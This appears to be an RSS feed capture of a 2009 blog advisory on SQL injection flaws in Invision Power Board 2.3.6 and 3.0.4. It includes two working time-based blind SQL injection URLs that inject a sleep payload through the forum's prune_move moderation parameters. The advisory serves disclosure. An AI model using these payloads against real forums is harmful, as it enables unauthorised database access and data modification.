GO IT WORLD | IT TECH | IT NEWS » power board http://www.goitworld.com goitworld.com Tue, 10 Jan 2012 10:03:06 +0000 en hourly 1 http://wordpress.org/?v=3.1.2 Invision Power Board SQL Injection Vulnerabilities http://www.goitworld.com/invision-power-board-sql-injection-vulnerabilities/ http://www.goitworld.com/invision-power-board-sql-injection-vulnerabilities/#comments Mon, 07 Dec 2009 03:32:13 +0000 jason http://www.goitworld.com/invision-power-board-sql-injection-vulnerabilities/

Version:

Invision Power Services Invision Power Board 2.3.6
Invision Power Services Invision Power Board 3.0.4

Description:

The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Test

http://www.example.com/?app=forums&module=moderate&section=moderate&f=1&do=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&s
tarter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20–%20skip%20&auth_key=c4276b77602767228faa9760eb4a5abd

http://www.example.com/forum/?act=mod&f=1&CODE=prune_move&df=3&pergo=50&dateline=0&state=open&ignore_pin=1&max=0&starter=1%20AND%20starter_id=1%20OR
%20substr(version(),1,1)=5%20AND%20sleep(16)%20–%20skip%20&auth_key=040c4a6e768d626b4c05a4bb0fbf315c

]]> http://www.goitworld.com/invision-power-board-sql-injection-vulnerabilities/feed/ 9